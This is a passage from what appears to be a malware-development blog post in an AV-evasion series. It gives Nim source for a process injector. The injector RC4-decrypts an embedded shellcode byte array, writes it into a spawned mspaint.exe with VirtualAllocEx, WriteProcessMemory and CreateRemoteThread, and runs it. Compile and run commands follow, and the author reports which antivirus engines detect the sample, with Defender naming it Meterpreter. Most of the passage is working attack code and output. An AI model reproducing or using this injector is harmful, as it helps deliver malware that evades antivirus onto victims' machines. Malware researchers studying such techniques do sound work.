    0x1E, 0xD1, 0x1A, 0xDE, 0x2D, 0xB8, 0xA2, 0xA1, 0x6B, 0x7D, 0x0F, 0xC0, 0xC0, 
    0x66, 0x4A, 0x9E, 0x9A, 0x9A, 0x93, 0x6B, 0xA4, 0x63, 0x51, 0xA0, 0x91, 0xB0, 
    0x99, 0x21, 0xDC, 0xDB, 0x41, 0xF7, 0xCC, 0xB8, 0xD5, 0x4B, 0xFF, 0xA2, 0x58, 
    0xA8, 0xEF, 0xE3, 0x90, 0x50, 0x3C, 0x03, 0x30, 0x42, 0x3C, 0x1B, 0x5F, 0x9C, 
    0x8F, 0xF2, 0xC7, 0x19, 0xA5, 0x07, 0x3E, 0x1C, 0x70, 0x6E, 0x80, 0xDA, 0x23, 
    0x37, 0x51, 0x98, 0x7D, 0xBE, 0x55, 0xF9, 0x56, 0x52, 0x0E, 0x48, 0x40, 0x2D, 
    0x9A, 0xD3, 0x0F, 0xB8, 0x92, 0x62, 0xE7, 0x5C, 0x0A, 0x2E, 0xFE, 0xF8, 0x96, 
    0x8E, 0x10, 0x6A, 0x04, 0x0B, 0xDD, 0x24, 0xCB, 0x18, 0x20, 0x9E, 0x23, 0x9A, 
    0x57, 0xC1, 0x38, 0xC0, 0xD7, 0x0A, 0x57, 0x3E, 0x80, 0x75, 0x9B, 0x79, 0x59, 
    0xB6, 0x31, 0xE4, 0x3E, 0xBA, 0xBB, 0x1E, 0x91, 0xC5, 0x10, 0xA0, 0x63, 0x6B, 
    0x99, 0x9F, 0x61, 0x6C, 0xB5, 0x1A, 0x09, 0x61, 0xFD, 0x21, 0xCC, 0x64, 0xC4, 
    0x9C, 0xCA, 0x15, 0xA1, 0x3B, 0x62, 0x44, 0x5B, 0x34, 0xDC, 0x06, 0xEB, 0x8F, 
    0xB1, 0x50, 0x7B, 0x1C, 0x77, 0xC7, 0x8B, 0x24, 0x34, 0x5E, 0xC4, 0x02, 0x00, 
    0x3F, 0x1D, 0x05, 0x2E, 0x18, 0xC5, 0xEA, 0x6D, 0x6F
    ]
  let key: seq[byte] = @[0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77]

  let payload = RC4(plaintext, key)

  let process = startProcess("mspaint.exe")
  echo "started  process: ", process.processID

  let ph = winim.OpenProcess(
    PROCESS_ALL_ACCESS,
    false,
    cast[DWORD](process.processID)
  )

when isMainModule:
    let mem = VirtualAllocEx(
        ph,
        NULL,
        cast[SIZE_T](plaintext.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READWRITE
    )
    var btw: SIZE_T
    let wp = WriteProcessMemory(
        ph,
        mem,
        unsafeAddr payload[0],
        cast[SIZE_T](plaintext.len),
        addr btw
    )
    echo "writeprocessmemory: ", bool(wp)
    let th = CreateRemoteThread(
        ph,
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](mem),
        NULL,
        0,
        NULL
    )
    echo "successfully inject to process: ", process.processID
    echo "thread Handle: ", th

demo 2

Compile practical example 2:

nim c -d:mingw --cpu:amd64 hack2.nim


And run the new file on Windows 11:

.\hack2.exe


To verify that our payload is indeed injected into the mspaint.exe process, we can use Process Hacker 2; in the memory section we can see:


So, it seems our simple injection logic worked!

Upload this sample to https://websec.nl/en/scanner:


https://websec.nl/en/scanner/result/b1497b7b-af49-48f7-870e-2d612ecd1ad3

As you can see, 4 of 40 AV engines detected our file as malicious.

Note that Microsoft Defender detects it as VirTool:Win32/Meterpreter:


I hope this post is useful for malware researchers, C/C++ programmers and offensive security professionals.

RC4
Malware AV/VM evasion part 9
https://websec.nl/en/scanner
source code in github

This is a practical case for educational purposes only.

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine
